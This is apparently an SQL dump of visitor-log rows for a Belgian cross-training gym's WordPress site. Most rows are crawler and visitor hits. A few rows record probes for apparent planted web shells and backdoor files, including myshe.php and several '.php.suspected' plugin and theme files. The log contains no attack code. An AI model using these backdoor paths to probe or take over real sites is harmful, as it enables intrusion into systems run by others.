(75897, 1498158885.488732, 3657083672, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(75898, 1498167517.908106, 3657083672, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/266-2/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(75899, 1498168575.558437, 1123634244, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75900, 1498176806.704008, 1123631811, 0, 0, 1, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75901, 1498176808.058007, 1123634244, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75902, 1498184423.998321, 3024883600, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(75903, 1498187183.778108, 3492536660, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(75904, 1498187187.948977, 3492536660, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(75905, 1498187192.929457, 3492536660, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(75906, 1498187197.412116, 3492536660, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(75907, 1498187202.622172, 3492536660, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(75908, 1498187216.686298, 3492536660, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(75909, 1498187226.436174, 3492536660, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(75910, 1498187231.508134, 3492536661, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(75911, 1498187805.373098, 1123634244, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75912, 1498190230.155127, 2637637428, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(75913, 1498193448.331507, 3564054600, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/wp-content/plugins/myshe.php', 'http://crosstrainingcenter.be/wp-content/plugins/myshe.php', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(75914, 1498196834.932891, 1538615370, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'android-app://com.google.android.googlequicksearchbox/https/www.google.com', 'Mozilla/5.0 (Linux; Android 7.0; SM-G928F Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.83 Mobile Safari/537.36'),
(75915, 1498196836.951983, 1538615370, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Linux; Android 7.0; SM-G928F Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.83 Mobile Safari/537.36'),
(75916, 1498201286.908030, 2366148185, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(75917, 1498202359.156820, 1834559909, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-limelette/', 'https://www.google.be/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),
(75918, 1498202361.687816, 1834559909, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/les-seances-limelette/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),
(75919, 1498202368.553434, 1834559909, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/les-seances-limelette/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),
(75920, 1498205814.744954, 96753435, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(75921, 1498205815.897165, 872366385, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(75922, 1498206827.553200, 3166542325, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.2.5 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.5'),
(75923, 1498206828.979019, 3166542325, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.2.5 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.5'),
(75924, 1498206829.584286, 3166542325, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.2.5 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.5'),
(75925, 1498206829.679023, 3166542325, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/10603.2.5 CFNetwork/720.5.7 Darwin/14.5.0 (x86_64)'),
(75926, 1498206830.143486, 3166542325, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/10603.2.5 CFNetwork/720.5.7 Darwin/14.5.0 (x86_64)'),
(75927, 1498207323.969050, 1374769563, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(75928, 1498207324.555271, 1374769563, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75929, 1498207324.997440, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75930, 1498207325.447731, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75931, 1498207325.882878, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75932, 1498207326.318380, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75933, 1498207326.883521, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75934, 1498207327.300037, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75935, 1498207327.800656, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75936, 1498207328.231261, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75937, 1498207328.733850, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75938, 1498207784.032317, 1833311020, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/wp-db-ajax-made/user-info.php.suspected', 'http://crosstrainingcenter.be/wp-content/plugins/wp-db-ajax-made/user-info.php.suspected', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(75939, 1498214869.789428, 3427775492, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0;  Trident/5.0)'),
(75940, 1498215349.015238, 1123631626, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-limelette/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75941, 1498215700.216538, 1123634244, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-limelette/feed/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75942, 1498216569.844935, 1123634244, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75943, 1498230412.201875, 1374769563, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(75944, 1498230412.748029, 1374769563, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75945, 1498230413.177409, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75946, 1498230413.579527, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75947, 1498230414.047570, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75948, 1498230414.501000, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75949, 1498230415.047806, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75950, 1498230415.564200, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75951, 1498230415.995788, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75952, 1498230416.497015, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75953, 1498230416.940457, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75954, 1498233302.583442, 3587417960, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.2.5 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.5'),
(75955, 1498234200.247428, 1123634238, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75956, 1498234301.826539, 1123634238, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/feed/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75957, 1498235723.632216, 1833311020, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-forms-ajax.php.suspected', 'http://crosstrainingcenter.be/wp-forms-ajax.php.suspected', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(75958, 1498236018.651936, 1540278570, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/logo_img.php.suspected', 'http://crosstrainingcenter.be/logo_img.php.suspected', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(75959, 1498240292.480851, 1364734211, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/wp-db-ajax-made/db_info.class.php.suspected', 'http://crosstrainingcenter.be/wp-content/plugins/wp-db-ajax-made/db_info.class.php.suspected', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(75960, 1498242554.863957, 2637637428, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(75961, 1498243354.130421, 1374769563, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(75962, 1498243354.657742, 1374769563, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75963, 1498243355.255191, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75964, 1498243355.697259, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75965, 1498243356.109652, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75966, 1498243356.539022, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75967, 1498243357.016430, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75968, 1498243357.519400, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75969, 1498243358.143650, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75970, 1498243358.603521, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75971, 1498243359.159270, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75972, 1498250153.658155, 2461654898, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.96 Safari/537.36'),
(75973, 1498250602.573473, 1837280593, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.2.5 (KHTML, like Gecko)'),
(75974, 1498250603.045454, 1837280593, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75975, 1498250603.494682, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75976, 1498250603.916568, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75977, 1498250604.502170, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75978, 1498250604.989476, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75979, 1498250605.393180, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75980, 1498250605.909898, 1837280593, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(75981, 1498250606.320903, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75982, 1498250606.723827, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75983, 1498250607.138051, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75984, 1498250607.616253, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75985, 1498250608.109034, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75986, 1498250608.521868, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75987, 1498252457.412265, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75988, 1498252457.896817, 1123631300, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Googlebot-Image/1.0'),
(75989, 1498253926.204401, 96995098, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/changelog.php', 'http://crosstrainingcenter.be/changelog.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(75990, 1498255064.346648, 3024883475, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(75991, 1498255854.821187, 786801765, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; SemrushBot/1.2~bl; +http://www.semrush.com/bot.html)'),
(75992, 1498265191.216211, 3106783463, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://crosstrainingcenter.be/', 'Go-http-client/1.1'),
(75993, 1498265748.726695, 872366369, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(75994, 1498268758.577947, 2745959577, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0;  Trident/5.0)'),
(75995, 1498269063.390864, 1338305565, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/sitemap.xml', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(75996, 1498273632.099288, 1539836988, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/php-event-calendar/readme.txt', 'http://www.google.com/', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2896.3 Safari/537.36'),
(75997, 1498283815.398119, 1540872244, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/evolution/news_parser.class.php.suspected', 'http://crosstrainingcenter.be/wp-content/themes/evolution/news_parser.class.php.suspected', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(75998, 1498285104.610713, 1837280593, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.2.5 (KHTML, like Gecko)'),
(75999, 1498285105.116356, 1837280593, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(76000, 1498285105.613161, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(76001, 1498285106.181210, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(76002, 1498285106.709637, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(76003, 1498285107.119284, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(76004, 1498285107.554722, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(76005, 1498285107.987752, 1837280593, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(76006, 1498285108.423951, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(76007, 1498285108.843260, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(76008, 1498285109.279408, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(76009, 1498285109.771797, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(76010, 1498285110.218950, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(76011, 1498285110.656654, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(76012, 1498293517.987978, 1426857626, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/themes/popup-pomo.php', 'http://crosstrainingcenter.be/themes/popup-pomo.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(76013, 1498295391.241282, 1834609551, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0'),
(76014, 1498295392.358800, 1834609551, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0'),
(76015, 1498295397.595135, 1834609551, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0'),
